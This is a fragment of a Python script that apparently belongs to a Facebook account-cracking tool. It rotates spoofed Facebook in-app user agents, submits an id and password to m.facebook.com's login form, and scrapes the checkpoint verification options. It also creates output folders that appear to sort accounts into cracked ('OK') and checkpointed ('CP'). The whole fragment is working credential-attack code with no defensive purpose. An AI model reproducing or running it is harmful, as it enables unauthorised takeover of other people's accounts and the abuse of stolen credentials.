[FB_IAB/FB4A;FBAV/FBAV/469.0.0.23.21;]","Mozilla/5.0 (Linux; Android 10; Black Shark 4S Build/SP2A.653342.342; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/114.0.139.83 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/334.0.0.15.5;]","Mozilla/5.0 (Linux; Android 11; SM-A700K Build/RKQ1.201217.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/108.0.2051.117 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/486.0.0.21.67;]","Mozilla/5.0 (Linux; Android 9; SM-A700K Build/RKQ1.201217.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/67.0.78.94 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/218.0.0.15.17"
	sess.headers.update({"User-Agent":uua,"Host":"m.facebook.com","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9","referer":"https://mbasic.facebook.com/","user-agent":"ua"})
	soup=parse(sess.get("https://m.facebook.com/login/?next&ref=dbl&fl&refid=8").text,"html.parser")
	link=soup.find("form",{"method":"post"})
	for x in soup("input"):data.update({x.get("name"):x.get("value")})
	data.update({"email":idf,"pass":pw})
	response=parse(sess.post("https://m.facebook.com"+link.get("action"),data=data).text,"html.parser")
	try:
		link2=response.find("form",{"method":"post"});listInput=['fb_dtsg','jazoest','checkpoint_data','submit[Continue]','nh']
		for x in response("input"):
			if x.get("name") in listInput:data2.update({x.get("name"):x.get("value")}) 
		responses=parse(sess.post("https://m.facebook.com"+link2.get("action"),data=data2).text,"html.parser")
		cek=[cek.text for cek in responses.find_all("option")]
		if len(cek)==0:pass
		else:
			for opsi in range(len(cek)):ops.append(print("[bold white]"+cek[opsi]))
	except:pass
	if len(ops)==0:pass
	print (' >>> Columns(ops)')
#-----------------------[ SYSTEM-CONTROL ]--------------------#
if __name__=='__main__':
	try:os.system('git pull')
	except:pass
	try:os.mkdir('kz-OK')
	except:pass
	try:os.mkdir('kz-CP')
	except:pass
	login()
